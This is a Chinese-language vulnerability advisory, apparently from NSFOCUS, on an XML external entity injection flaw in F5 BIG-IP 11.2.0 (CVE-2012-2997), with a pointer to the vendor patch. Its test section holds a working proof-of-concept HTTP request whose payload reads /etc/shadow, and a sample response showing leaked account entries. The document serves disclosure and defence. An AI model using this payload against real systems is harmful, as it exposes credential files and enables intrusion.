安全研究

安全漏洞
F5 BIG-IP XML外部实体注入漏洞

发布日期:2013-01-22
更新日期:2013-01-23

受影响系统:
F5 BigIP 11.2.0
描述:
BUGTRAQ  ID: 57496
CVE(CAN) ID: CVE-2012-2997

F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。

F5 BIG-IP在实现上存在XML外部实体注入漏洞,成功利用后可允许攻击者获取本地文件内容。

<*来源:S. Viehb&#195;&#182;ck
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml  version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>


The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::

建议:
厂商补丁:

F5
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.f5.com/bigip

浏览次数:4168
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障